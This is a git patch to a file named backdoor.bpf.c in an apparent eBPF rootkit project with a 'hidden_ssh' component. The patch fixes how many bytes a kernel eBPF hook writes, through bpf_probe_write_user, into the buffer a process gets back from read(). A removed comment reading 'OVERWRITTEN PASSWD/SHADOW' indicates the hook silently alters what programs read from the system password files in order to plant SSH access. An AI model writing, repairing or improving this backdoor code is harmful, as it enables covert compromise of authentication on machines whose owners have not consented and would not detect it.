From 40717eb393c879fb86a03403bdac1a16a72eadeb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Rom=C3=A9o=20Phang?= <contact@phang.fr>
Date: Tue, 3 Sep 2024 16:37:18 +0200
Subject: [PATCH] fix: dynamic length eBPF writing

---
 lib/libbpf                    |  2 +-
 src/hidden_ssh/backdoor.bpf.c | 14 +++++++++++---
 2 files changed, 12 insertions(+), 4 deletions(-)

diff --git a/lib/libbpf b/lib/libbpf
index f81eef2..caa17bd 160000
--- a/lib/libbpf
+++ b/lib/libbpf
@@ -1 +1 @@
-Subproject commit f81eef23b33c0dbf923e863a72ce51ea4d32e291
+Subproject commit caa17bdcbfc58e68eaf4d017c058e6577606bf56
diff --git a/src/hidden_ssh/backdoor.bpf.c b/src/hidden_ssh/backdoor.bpf.c
index 6557d6b..08dea0a 100644
--- a/src/hidden_ssh/backdoor.bpf.c
+++ b/src/hidden_ssh/backdoor.bpf.c
@@ -408,10 +408,18 @@ int read_exitpoint(struct trace_event_raw_sys_exit *ctx)
         {
             return 0; // You should not be here
         }
-        if (ctx->ret > 0 && ctx->ret <= sizeof(file->buff))
+        int overwrite_len = 0; // need to reach to ctx->ret
+        for (int i = 0; i < 6500; i += 1) // arbitrary value
         {
-            // bpf_printk("OVERWRITTEN PASSWD/SHADOW");
-            bpf_probe_write_user((void *)e->buff, (void *)file->buff, ctx->ret);
+            if (i + 1 > ctx->ret)
+            {
+                overwrite_len = i;
+                break;
+            }
+        }
+        if (overwrite_len > 0 && overwrite_len <= sizeof(file->buff) && overwrite_len <= ctx->ret)
+        {
+            bpf_probe_write_user((void *)e->buff, (void *)file->buff, overwrite_len);
         }
     }